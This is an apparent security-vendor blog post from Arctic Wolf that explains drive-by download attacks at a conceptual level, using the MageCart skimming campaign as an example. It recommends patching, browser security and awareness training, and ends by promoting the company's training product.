An employee at a large organisation is doing research for a client and clicks on what they believe is a legitimate website. What they don’t realise is, while they’re browsing, malware in the form of a Trojan virus is swiftly downloading onto their endpoint. The Trojan jumps from the endpoint into the organisation’s network, and suddenly, their cybersecurity system rings alarms as ransomware takes hold in the environment.
This type of covert attack that happens without a user even realising it is known as a drive-by download attack, and it’s becoming a common approach for threat actors looking to bypass traditional social engineering tactics and launch sophisticated attacks without detection.
What Are Drive-By Download Attacks?
Drive-by download attacks, also known as watering hole attacks, occur when a threat actor compromises a website, link, or digital advertisement, subsequently tricking users into downloading malware from those corrupted links. While drive-by downloads can be categorized as fileless malware, not every attack is fileless. It’s dependent on the threat actor and the malware they are using.
This tactic allows threat actors to bypass the work of social engineering, and instead just lie in wait, knowing users will come to them.
Examples of drive-by download attacks used by threat actors include:
- Compromising legitimate websites users may frequent
- Hiding adware in online advertisements
- Installing exploit kits on a website, which automatically searches for vulnerabilities on the user’s endpoint
- Compromising media files, including pop-ups on a website, that a user may download
The MageCart attacks, which began back in 2015 and are still an often-repeated tactic, highlight how this method works for threat actors. In this scheme, threat actors would gain access to online retailers’ websites, and then implement malware that skims user’s credit card information as they make purchases. Any user going to make a purchase is suddenly a victim of theft.
How Drive-By Download Attacks Work
Drive-by download attacks will differ by the threat actor’s motivations – in the MageCart example, the goal is to steal financial information – so each malware strain and result will vary. But the attack follows a few universal steps.
1. Threat actor compromises a website an organisation frequents (if it’s a targeted attack) or is just popular with users.
2. Users visit that site or click on a compromised link, unknowingly triggering the attack.
3. A threat actor gains access to the user’s endpoint through a strain of malware or a vulnerability exploitation kit.
4. The threat actor launches a more sophisticated cyber attack, be it ransomware, data exfiltration, or another common attack type.
As mentioned above, a threat actor can utilise a variety of tools in their toolkit during a drive-by download attack, as the crux of the attack is the compromised website or other digital asset.
Common attacks that stem from drive-by downloads include:
- Ransomware
- Trojan malware
- Vulnerability exploit kits
- Spyware
- Keyloggers
- Adware
- Botnets
- Root kits
- Cryptojacking
How Can Users Prevent Falling Prey to Drive-By Download Attacks?
Because drive-by download attacks are dependent on users not realising what’s happening, they can be hard to detect and harder to prevent. But there are a few steps organisations and individuals can take to stop this increasingly common threat.
1. Implement a risk-based vulnerability management program to reduce the risk posed by exploit kits. Exploit kits will scan a user’s endpoint for vulnerabilities. If your organisation is up to date on patching, that exploit kit will fail in its endeavor, stopping the attack before it begins.
2. Have browser security and antivirus in place to prevent malware from automatically downloading. Antivirus, which is more basic, is still plenty helpful in preventing malware from accessing an endpoint. Additionally, setting up browsing security and controls on users’ endpoints will block suspicious sites and isolate browsing, reducing drive-by download risk.
3. Conduct security awareness training to educate users on the risks they face when browsing online or clicking on links.
The Role of Security Awareness Training in Stopping Drive-By Download Attacks
User action is at the heart of drive-by download attacks, so educating users on how to spot these tactics can help an organisation stay safe while reducing human risk.
Organisations need to educate employees on specific attack types, including drive-by downloads, so they can spot threats before they turn into attacks. The best way to do that is by implementing a robust security awareness training program that creates a culture of awareness, builds good habits, and actively reduces human risk at every level of the organization.
Arctic Wolf® Managed Security Awareness® does exactly that, utilising up-to-date content, security expertise, and microlearning to help your users spot risks, stay safe, and build a culture of awareness.
Learn more about our security training platform.
Learn more about the kinds of cyber attacks your organisation could face with the Arctic Wolf 2024 Security Operations Report.
